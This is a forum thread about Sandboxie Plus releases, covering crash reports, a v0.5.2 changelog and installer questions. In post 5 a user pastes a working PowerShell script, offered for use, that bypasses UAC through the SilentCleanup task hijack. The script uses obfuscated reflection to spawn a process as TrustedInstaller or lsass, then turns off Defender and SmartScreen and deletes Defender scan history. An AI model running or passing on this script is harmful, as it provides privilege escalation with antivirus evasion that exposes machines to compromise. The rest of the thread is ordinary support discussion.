Released Sandboxie Plus (Sbie fork) Versions with Signed Driver

Discussion in 'Sandboxie (SBIE Open Source) Plus & Classic' started by DavidXanatos, Dec 7, 2020.

  1. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,027
    Location:
    Mexico
    Same, I wonder why it hasn't be upgraded too.
     
  2. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,171
    Location:
    Viena
    First of all it may be this issue: https://github.com/sandboxie-plus/Sandboxie/issues/221 that will be fixed in the next release
    When the BSOD occurs you should get a memory dump of you post it I can debug the issue.
    you can use this tool to get the right dmp file: https://www.nirsoft.net/utils/blue_screen_view.html
     
  3. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,171
    Location:
    Viena
    Because that menu is provided by the start.exe and not by the main UI component, also its simple enough that updating it has no priority.
     
  4. focus

    focus Registered Member

    Joined:
    Feb 5, 2007
    Posts:
    483
    Location:
    USA
    Turn off Windows Defender Core Isolation until David gets it fixed up.
     
  5. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,027
    Location:
    Mexico
    I agree.

    Code:
    @(echo off% <#%) &title Toggle Defender, AveYo 2020-11-16          || configure just auto-actions OFF; toggle icon on ltsb
    set "0=%~f0"&set 1=%*&powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1]
    sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
    if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}
    
    ## Comment to hide dialog prompt with Yes, No, Cancel (6,7,2)
    if ($env:1 -ne 6 -and $env:1 -ne 7) {
      $choice=(new-object -ComObject Wscript.Shell).Popup($A + ' Windows Defender?', 0, 'Defender is: ' + $S, 51)
      if ($choice -eq 2) {break} elseif ($choice -eq 6) {$env:1=$TOGGLE} else {$env:1=$KEEP}
    }
    
    ## Without the dialog prompt above will toggle automatically
    if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }
    
    ## Comment to not relaunch systray icon
    start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1
    
    ## Comment to not hide per-user toggle notifications
    $notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
    ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
    sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}
    
    ## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bpass?
    $ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
    $bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition
    
    ## Cascade elevation
    $u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}
    
    ## Reload from volatile registry as needed
    $r=[char]13; $nfo=[char]39+$r+' (\   /)'+$r+'( * . * )  A limited account protects you from UAC exploits'+$r+'    ```'+$r+[char]39
    $script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
    $script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script
    
    ## 0: limited-user: must runas
    if ($u -eq 0) {
      start powershell -args $script -verb runas -win 1; break
    }
    
    ## 1: admin-user non-elevated: try windows built-in lame uac bpass before runas
    if ($u -eq 1) {
      if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
      sp hkcu:\environment windir $('powershell '+$script+' #')
      $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
      if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
    }
    
    ## 2: admin-user elevated: get ti/system via runasti lean and mean snippet [$window hide:0x0E080600 show:0x0E080610]
    if ($u -eq 2) {
      $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
      1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
      $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
      $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
      1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
      nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
      $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
      'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
      $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
      $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
      $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
      $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
    }
    
    ## Create registry paths
    $wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    ' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}
    
    ## Toggle Defender
    if ($env:1 -eq 7) {
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      sc.exe config windefend depend= RpcSs
      net1 start windefend
      kill -Force -Name MpCmdRun -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1
    } else {
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      net1 stop windefend
      sc.exe config windefend depend= RpcSs-TOGGLE
      kill -Name MpCmdRun -Force -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0           ## Commented = keep scan history
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
    }
    
    ## PERSONAL CONFIGURATION TWEAK - COMMENT OR UNCOMMENT #rp ENTRIES TO TWEAK OR REVERT
    sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0                       ## Auto Actions OFF
    # rp $wdp DisableRoutinelyTakingAction -Force -ea 0                                   ## Auto Actions ON [default]
    sp $wdp PUAProtection 1 -Type Dword -Force -ea 0                                      ## Potential Unwanted Apps ON
    rp $wdp PUAProtection -Force -ea 0                                                    ## Potential Unwanted Apps OFF [default]
    sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0                    ## Cloud blocking level HIGH
    rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0                                  ## Cloud blocking level LOW [default]
    sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0                        ## Cloud protection ADVANCED
    rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0                                      ## Cloud protection BASIC [default]
    sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0                   ## Sample Submission ALWAYS-PROMPT
    rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0                                 ## Sample Submission AUTOMATIC [default]
    sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0    ## Scan incoming file only
    rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0                  ## Scan incoming and outgoing file [default]
    
    ## Uncomment to close windows built-in lame uac bpass and/or reset uac
    # if ($flaw.Actions.Item(1).Path -ilike '*windir*') {
    #   $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe'               ## %windir%\system32\cleanmgr.exe [default]
    #   $baffling.RegisterTaskDefinition($bpass.Name,$flaw,20,$null,$null,$null)          ## UAC silent bpass mitigation
    #   $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    #   sp $uac EnableLUA 1 -Type Dword -Force -ea 0                                      ## UAC enable
    #   sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0                     ## UAC always notify - bpassable otherwise
    #   sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0                          ## UAC secure - prevent automation
    # }
    
    '@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
    #-_-# hybrid script, can be pasted directly into powershell console
    
    
     
  6. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    14,774
    Location:
    The Netherlands
    OK thanks, when it's fixed I will give Sandboxie Plus a try again. BTW, for the people who prefer the standard GUI, will you keep updating Sandboxie Classic?
     
  7. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    17,694
    Location:
    UK
  8. Survivor

    Survivor Registered Member

    Joined:
    Jul 11, 2020
    Posts:
    132
    Location:
    Land of Oz
    OK, fair enough, was just coming under my screen. Sure no prio. If MS can do this with a win 10 control panel but many options jumping to the classic, there is no issue for one dev to make this a when it is done prio. :cool: FullAck
     
  9. Vikterola62

    Vikterola62 Registered Member

    Joined:
    Dec 14, 2020
    Posts:
    7
    Location:
    USA
    David they both look great, I would vote for top art! Thanks!
     
  10. Peter 123

    Peter 123 Registered Member

    Joined:
    Feb 1, 2009
    Posts:
    444
    Location:
    Austria
    Sorry for a perhaps quite trivial question:

    What happens when I switch from Windows 10 32-bit to Windows 10 64-bit and therefore I switch from Sandboxie 32-bit to Sandboxie 64-bit too (in my case the classic Sandboxie 5.45)? Will my Sandboxes and their settings be kept?

    I ask because two days ago I made a test upgrade from Windows 32 to Windows 64 bit. When installing Sandboxie 64-bit I remember that this version recognized the old one (= 32 bit) and I think it asked me if I want to keep its settings (just like it happens during a normal update). I always answer with "yes". But after the installation of the 64 bit version all my old sandboxes were gone.
     
  11. AvinashR

    AvinashR Registered Member

    Joined:
    Dec 26, 2009
    Posts:
    2,063
    Location:
    New Delhi Metallo β-Lactamase 1
  12. wissec

    wissec Registered Member

    Joined:
    Apr 11, 2020
    Posts:
    36
    Location:
    Out
    I hope it will be soon the new update of the classic version, with the v5.45.0 64bit apart from the known bug already commented, my win10 is constantly slowing down. I'm convinced that it's because of the SBE. Thanks so much David for continuing working on this software.
     
  13. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,171
    Location:
    Viena
    That's a bug for the over next release...


    Yes should be just fine.

    I will not add any new features to sbiectrl.exe and not fix any bugs that I don't introduce myself by changing other components, except may be very minor once.
    I will provide a classic installer for as long as people use it but the UI will stay at the state it was released by sophos.
    You can use new plus features with the classic build by editing the sandboxie.ini by hand because plus and classic share core components.
    For an improved UI experience and support for new features please upgrade to the Plus Build.
     
  14. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,171
    Location:
    Viena
    Also I have tried what it changes when I sign the 32 bit sbie classic installer with the EV cert, detections go down from16 to 12 but still WTF really WTFF
    Given that level of screw up form the Anti malware Fools I'd rather tend to really don't care and don't waste time with signing anything but the driver.
     
  15. AvinashR

    AvinashR Registered Member

    Joined:
    Dec 26, 2009
    Posts:
    2,063
    Location:
    New Delhi Metallo β-Lactamase 1
    I think you should sign the installer. It gives a greater confidence to new users who wanted to use it after reading about Sandboxie. You shouldn't give a f**k about detection over VT. It will eventually come down to 0 for sure.
     
  16. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,171
    Location:
    Viena
    This is a maintenance release it does not bring any major new features but resolves a myriad of various bugs including a BSOD issue when "Core isolation" was enabled and a major compatibility bug with windows 10 build 2004 and later.
    It also brings a few minor +UI Improvements and an entirely new set of Icons.


    For Windows 7 unfortunately the signing process did not returned a working driver, a solution is being worked on.
    Therefor, for the time being please download the "Provisional Windows 7 Drivers.zip" package and provide the driver to the setup when prompted for.

    If you have issues with an update installation, just uninstall the previous version keeping the sandboxie.ini and reinstall the new build.

    Download: https://github.com/sandboxie-plus/Sandboxie/releases/tag/v0.5.2

    Change Log
    Added
    • added advanced new box creation dialog to sandman ui
    • added show/hide tray context menu entry
    • added refresh button to file recovery dialog
    • added mechanism to load icons from {install-dir}/Icons/{icon}.png for UI customization
    • added tray indicator to show disabled forced program status in the sandman ui
    • added program name suggestions to box options in sandman ui
    • added saving of column sizes in the options window
    Changed
    • reorganized the advanced box options a bit
    • changed icons (thanks Valinwolf for picking the new once)
    • updated Template.ini (thanks isaak654)
    • increates max value for disable forced process time in sandman ui
    Fixed
    • fixed BSOD introduced in 5.45.0 when using windows 10 "Core isolation"
    • fixed minor issue with lingering/leader processes
    • fixed menu issue in sandman ui
    • fixed issue with stop behavioure page in sandman ui
    • fixed issue with Plus installer not displaying kmdutil window
    • fixed sandman UI saving ui settings on windows shutdown
    • fixed issue with Plus installer autorun
    • fixed issue with legacy installer not removing all files
    • fixed a driver compatybility issue with windows 20H1 and later
      -- this solves "stop pending", line messager hanging and other issues...
    • fixed quick recovery issue in SbieCtrl.exe introduced in 5.45.0
    • fixed issue advanced hide process settings, not saving
    • fixed some typos in the UI (thanks isaak654)
    • fixed issue with GetRawInputDeviceInfo failing when boxed processes are put in a job object
      -- this fix resolves isses with CP2077 andother PC Games not getting keyboard input (thanks Rostok)
    • fixed failing ClipCursor wont longer span the message log
    • fixed issue with adding recovery folders in sandman ui
    • fixed issue with office 2019 template when using a non default sbie install location
    • fixed issue settign last access atribute on sandboxed folders
    • fixed issue with process start signal
     
  17. davi

    davi Registered Member

    Joined:
    Jul 3, 2020
    Posts:
    19
    Location:
    RO
    Hello,

    Just installed the 0.5.2 release and it seems from the new sandboxie UI i get an error when trying to launch explorer, tried the old GUI and with that it works to launch an explorer instance.
    The error that i get is:
    upload_2020-12-23_15-7-43.png
     
  18. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    17,694
    Location:
    UK
    Did a clean install of 0.5.2 above.
    Download and install was painless. Defender wasn't interested in it.

    Stop behaviour is fixed. When Vivaldi is closed... sbie Plus closes straight away.
    I can recover a file from Downloads folder now so you have fixed File Recovery options.
    However I do not have immediate recovery selected but it is recovering the files as soon as the download is finished.
    How do I get Plus to only recover the file when the browser is closed? Will it give me the option to keep it like legacy did?

    When I close the sbie'd browser and afterwards open the sandman from desktop icon or taskbar icon, the size is still minimized even though I closed it as maximised. last time it was opened

    Good work @DavidXanatos
     
  19. Peter 123

    Peter 123 Registered Member

    Joined:
    Feb 1, 2009
    Posts:
    444
    Location:
    Austria
    Thanks for your reply. David. That means that obviously I made some mistake when installing the 64-bit version of Sandboxie.

    So my additional question:
    In order to correct the situation: Is it sufficient (especially with regard to security) when I replace now the ini.file of the 64-bit version by the ini.file of the 32-bit version?
     
  20. Harper

    Harper Registered Member

    Joined:
    Dec 12, 2020
    Posts:
    15
    Location:
    Nowhere
    Hello

    Have you tried installing CheatEngine on Sbie-plus before? My attempt failed.
     
  21. henryg1

    henryg1 Registered Member

    Joined:
    Jun 14, 2020
    Posts:
    201
    Location:
    uk
    upload_2020-12-23_15-4-21.png
    Sbie Control was not running, so I thought would need to uninstall first as usual. But on rebooting and without uninstalling first, the new version had been installed.

    EDIT - this was Classic not Plus
     
    Last edited: Dec 23, 2020
  22. henryg1

    henryg1 Registered Member

    Joined:
    Jun 14, 2020
    Posts:
    201
    Location:
    uk
    I thought I should give Plus a proper try again as it looks to be the future given David's comment above. So I uninstalled Classic then installed Plus, which picked up my sandboxie.ini file & settings with no problems I can see yet.

    A couple of initial questions:
    1. the colours of the icons for each sandbox in the SandMan Control window differs from those I have set for each individual sandbox's window border which I find confusing

    upload_2020-12-23_16-45-51.png

    and is there any way I make them the same?

    2. Sticky Password now seems to work but only if dropped rights are disabled. Wasn't a problem in times past, and any way of circumventing this? I suspect not.
     
  23. focus

    focus Registered Member

    Joined:
    Feb 5, 2007
    Posts:
    483
    Location:
    USA
    Nice, thank you. Merry Christmas!
     
  24. Rainwalker

    Rainwalker Registered Member

    Joined:
    May 18, 2003
    Posts:
    2,612
    Location:
    USA
    I am running 0.5.1. How do I do a uninstall so I can upgrade to 0.5.2 and if I do an uninstall how do I keep the settings I now have in .1? o_O
     
    Last edited: Dec 23, 2020
  25. Monica2000

    Monica2000 Registered Member

    Joined:
    May 18, 2020
    Posts:
    59
    Location:
    Spain
    I´m using Firefox and i can´t download Sandboxie-Plus-x64-v0.5.2 because of viruses.

    I can download SandboxieInstall64-v5.45.1.exe but is not clean at all according to VT because file is not signed!
     
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.